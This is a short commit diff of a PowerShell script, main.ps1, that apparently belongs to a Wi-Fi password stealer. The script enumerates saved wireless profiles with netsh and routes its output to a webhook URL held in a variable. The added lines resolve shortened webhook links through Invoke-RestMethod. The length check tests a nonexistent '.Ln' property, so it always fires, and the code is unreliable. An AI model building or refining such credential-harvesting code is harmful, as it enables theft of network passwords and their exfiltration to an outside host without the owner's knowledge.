Update main.ps1
This commit is contained in:
@@ -1,4 +1,7 @@
|
|||||||
$whuri = "$dc"
|
$whuri = "$dc"
|
||||||
|
# shortened URL Detection
|
||||||
|
if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url}
|
||||||
|
|
||||||
$outfile=""
|
$outfile=""
|
||||||
$a=0
|
$a=0
|
||||||
$ws=(netsh wlan show profiles) -replace ".*:\s+"
|
$ws=(netsh wlan show profiles) -replace ".*:\s+"
|
||||||
|
|||||||
Reference in New Issue
Block a user